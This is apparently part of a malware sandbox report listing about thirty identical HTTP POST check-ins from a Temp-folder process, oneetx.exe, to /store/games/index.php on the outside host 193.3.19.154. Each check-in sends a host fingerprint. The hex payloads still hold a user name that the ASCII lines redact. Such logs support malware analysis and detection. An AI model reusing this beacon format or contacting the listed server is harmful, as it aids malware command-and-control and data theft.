                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.549848193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:12.280874014 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.549859193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:16.532166004 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.549867193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:20.790802956 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.549878193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:25.131287098 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.549887193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:29.402793884 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.549898193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:33.813493967 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.549909193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:38.049715996 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.549920193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:42.298825026 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.549930193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:46.556485891 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.549940193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:50.800801039 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.549950193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:55.048923969 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.549958193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:54:57.781066895 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.549967193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:02.021011114 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.549976193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:06.276736021 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.549987193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:10.514265060 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.549998193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:14.752942085 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.550009193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:19.005067110 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.550016193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:23.267354965 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.550017193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:27.524590969 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.550018193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:31.769241095 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  43192.168.2.550019193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:36.015755892 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  44192.168.2.550020193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:40.237325907 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  45192.168.2.550021193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:44.468620062 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  46192.168.2.550022193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:48.775316954 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.550023193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:53.018945932 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.550024193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:55:57.425158978 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.550025193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:01.674710989 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.550026193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:05.921580076 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.550027193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:10.155056953 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.550028193.3.19.154806160C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  TimestampBytes transferredDirectionData
                  Nov 23, 2024 20:56:14.447710991 CET242OUTPOST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
